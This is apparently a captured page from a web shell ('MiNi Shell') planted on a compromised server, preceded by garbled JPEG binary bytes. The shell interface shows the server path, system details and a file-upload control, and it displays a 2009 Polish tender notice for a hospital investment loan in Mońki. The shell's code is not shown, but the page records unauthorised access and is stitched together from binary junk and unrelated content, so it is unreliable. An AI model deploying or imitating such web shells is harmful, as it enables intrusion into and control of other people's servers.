JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/128803-N-2009.html

<p class="kh_header"><b>Mońki: Przedmiotem zamówienia jest udzielenie i obsługa kredytu inwestycyjnego czteroletniego w wysokości 750 000,00 złotych na:
A.	Dostosowanie pomieszczeń Przychodni Rejonowej w Mońkach wraz z korytarzami na Oddziale Chorób Wewnętrznych wraz z dobudową windy w konstrukcji samonośnej do wymagań osób niepełnosprawnych - wartość inwestycji 380 000,00 złotych.
B.	Zakup aparatury RTG -  wartość 350 000,00 złotych 
C.	Remont pomieszczeń Pracowni RTG celem dostosowania do montażu i uruchomienia nowo zakupionej aparatury - wartość 20 000,00 złotych  
w Samodzielnym Publicznym Zakładzie Opieki Zdrowotne</b><br>
<b>Numer ogłoszenia: 128803 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Mońkach , al. Niepodległości 9, 19-100 Mońki, woj. podlaskie, tel. 085 727 81 30, 668 877 590, faks 0-85 727 81 35, 727 81 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-monki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest udzielenie i obsługa kredytu inwestycyjnego czteroletniego w wysokości 750 000,00 złotych na:
A.	Dostosowanie pomieszczeń Przychodni Rejonowej w Mońkach wraz z korytarzami na Oddziale Chorób Wewnętrznych wraz z dobudową windy w konstrukcji samonośnej do wymagań osób niepełnosprawnych - wartość inwestycji 380 000,00 złotych.
B.	Zakup aparatury RTG -  wartość 350 000,00 złotych 
C.	Remont pomieszczeń Pracowni RTG celem dostosowania do montażu i uruchomienia nowo zakupionej aparatury - wartość 20 000,00 złotych  
w Samodzielnym Publicznym Zakładzie Opieki Zdrowotne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest udzielenie i obsługa kredytu inwestycyjnego czteroletniego w wysokości 750 000,00 złotych na:
D.	Dostosowanie pomieszczeń Przychodni Rejonowej w Mońkach wraz z korytarzami na Oddziale Chorób Wewnętrznych wraz z dobudową windy w konstrukcji samonośnej do wymagań osób niepełnosprawnych - wartość inwestycji 380 000,00 złotych.
E.	Zakup aparatury RTG -  wartość 350 000,00 złotych 
F.	Remont pomieszczeń Pracowni RTG celem dostosowania do montażu i uruchomienia nowo zakupionej aparatury - wartość 20 000,00 złotych  
w Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej w Mońkach.
Uszczegółowienie przedmiotu zamówienia:
Przedmiotem zamówienia jest udzielenie i obsługa kredytu inwestycyjnego na okres 4 lat w kwocie 750 000,00 złotych na: 
A.	Dostosowanie pomieszczeń Przychodni Rejonowej w Mońkach wraz z korytarzami na Oddziale Chorób Wewnętrznych wraz z dobudową windy w konstrukcji samonośnej do wymagań osób niepełnosprawnych - wartość inwestycji 380 000,00 złotych.
B.	Zakup aparatury RTG -  wartość 350 000,00 złotych 
C.	Remont pomieszczeń Pracowni RTG celem dostosowania do montażu i uruchomienia nowo zakupionej aparatury - wartość 20 000,00 złotych  
w Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej w Mońkach.
Waluta kredytu: złotych polski (PLN.).
1.	Za podstawę oprocentowania kredytu przyjęto stawkę WIBOR 1 M  z miesiąca lipiec 2009 r. plus marżę banku.
2.	Uruchomienie kredytu - 01 wrzesień 2009 rok.
3.	Zamawiający nie dopuszcza możliwości pobierania opłat i prowizji od zaangażowania środków, to jest od niewykorzystanej części kredytu oraz od wcześniejszych spłat.
4.	Zamawiający dopuszcza jako jedyną prowizję związaną z udzieleniem i obsługą kredytu - prowizję za udzielenie kredytu.
5.	Prowizja przygotowawcza będzie pobrana przez bank jednorazowo przy uruchomieniu kredytu.
6.	Sposób spłaty kredytu: raty stałe , odsetki malejące stałe niezależne od WIBORU.
7.	Kredyt będzie zabezpieczony w formie poręczenia spłaty kredytu udzielonego przez Starostwo Powiatowe w Mońkach.
8.	Termin realizacji zamówienia - od dnia 01 września 2009 roku  do dnia 31 lipca 2013 r.
9.	Okres karencji dla spłaty kredytu - brak.
10.	Okres wykorzystania kredytu - do 31 lipca 2013 r.
11.	Okres wykorzystania i spłaty kredytu.


Lp.	Płatne do:	Spłata kapitału + odsetki
1.		30 wrzesień 2009	19 531,25 + odsetki
2.		31 październik 2009	19 531,25 + odsetki
3.		30 listopad 2009	19 531,25 + odsetki
4.		31 grudzień 2009	19 531,25 + odsetki
5.		31 styczeń 2010	15 625,00 + odsetki
6.		28 luty 2010	15 625,00 + odsetki
7.		31 marzec 2010	15 625,00 + odsetki
8.		30 kwietnia 2010	15 625,00 + odsetki
9.		31 maj 2010	15 625,00 + odsetki
10.		30 czerwiec 2010	15 625,00 + odsetki
11.		31 lipiec 2010	15 625,00 + odsetki
12.		31 sierpień 2010	15 625,00 + odsetki
13.		30 wrzesień 2010	15 625,00 + odsetki
14.		31 październik 2010	15 625,00 + odsetki
15.		30 listopad 2010	15 625,00 + odsetki
16.		31 grudzień 2010	15 625,00 + odsetki
17.		31 styczeń 2011	15 625,00 + odsetki
18.		28 luty 2011	15 625,00 + odsetki
19.		31 marzec 2011	15 625,00 + odsetki
20.		30 kwietnia 2011	15 625,00 + odsetki
21.		31 maj 2011	15 625,00 + odsetki
22.		30 czerwiec 2011	15 625,00 + odsetki
23.		31 lipiec 2011	15 625,00 + odsetki
24.		31 sierpień 2011	15 625,00 + odsetki
25.		30 wrzesień 2011	15 625,00 + odsetki
26.		31 październik 2011	15 625,00 + odsetki
27.		30 listopad 2011	15 625,00 + odsetki
28.		31 grudzień 2011	15 625,00 + odsetki
29.		31 styczeń 2012	15 625,00 + odsetki
30.		29 luty 2012	15 625,00 + odsetki
31.		31 marzec 2012	15 625,00 + odsetki
32.		30 kwietnia 2012	15 625,00 + odsetki
33.		31 maj 2012	15 625,00 + odsetki
34.		30 czerwiec 2012	15 625,00 + odsetki
35.		31 lipiec 2012	15 625,00 + odsetki
36.		31 sierpień 2012	15 625,00 + odsetki
37.		30 wrzesień 2012	15 625,00 + odsetki
38.		31 październik 2012	15 625,00 + odsetki
39.		30 listopad 2012	15 625,00 + odsetki
40.		31 grudzień 2012	15 625,00 + odsetki
41.		31 styczeń 2013	15 625,00 + odsetki
42.		28 luty 2013	15 625,00 + odsetki
43.		31 marzec 2013	15 625,00 + odsetki
44.		30 kwietnia 2013	15 625,00 + odsetki
45.		31 maj 2013	15 625,00 + odsetki
46.		30 czerwiec 2013	15 625,00 + odsetki
47.		31 lipiec 2013	15 625,00 + odsetki
	Razem	750 000,00 + odsetki


Do oceny zdolności kredytowej, Zamawiający dołącza do specyfikacji następujące dokumenty:
1. Rachunek zysków i strat oraz bilans za 2008 rok
Na dzień 31 lipca brak jest zobowiązań wymagalnych z tytułu podatków i ubezpieczeń..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale XIV pkt 1, dołączonych do oferty według formuły spełnia - nie spełnia. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki.
3.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych dokumentów i oświadczeń, o których mowa w rozdziale XIV pkt 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w rozdziale XIV pkt 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego dokumenty i oświadczenia powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
4.	Zamawiający wezwie także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących dokumentów i oświadczeń, o których mowa w rozdziale XIV pkt 1.
5.	W przypadku, gdy Wykonawcy nie spełnią chociażby jednego warunku, nie załączą do oferty wszystkich dokumentów i oświadczeń, o których mowa w rozdziale XIV pkt 1, nie złożą oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych Zamawiający wykluczy Wykonawców z postępowania o udzielenie zamówienia. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:
1.	W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu winien załączyć do oferty następujące dokumenty i oświadczenia:
1)	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 2 do specyfikacji istotnych warunków zamówienia.
2)	Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia określonego w art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 3 do specyfikacji istotnych warunków zamówienia.
3)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Inne dokumenty:
1)	Formularz ofertowy stanowiący załącznik nr 1 do specyfikacji istotnych warunków zamówienia.
2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale XIV pkt 1:
1)	ppkt 3)składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
3.   1)   Dokumenty, o których mowa w rozdziale XIV pkt 2 ppkt 1) lit. a) i c) powinny być
            wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o 
 którym mowa w rozdziale XIV pkt 2 ppkt 1) lit. a)powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale XIV pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4.	1) 	Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
2)	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
3)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-monki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Administracyjno-Techniczna Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach, ul. Al. Niepodległości 9, 19-100 Mońki..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 10:00, miejsce: Ofertę powinna być złożona w formie pisemnej w Sekretariacie Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach, ul. Al. Niepodległości 9, 19-100 Mońki..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com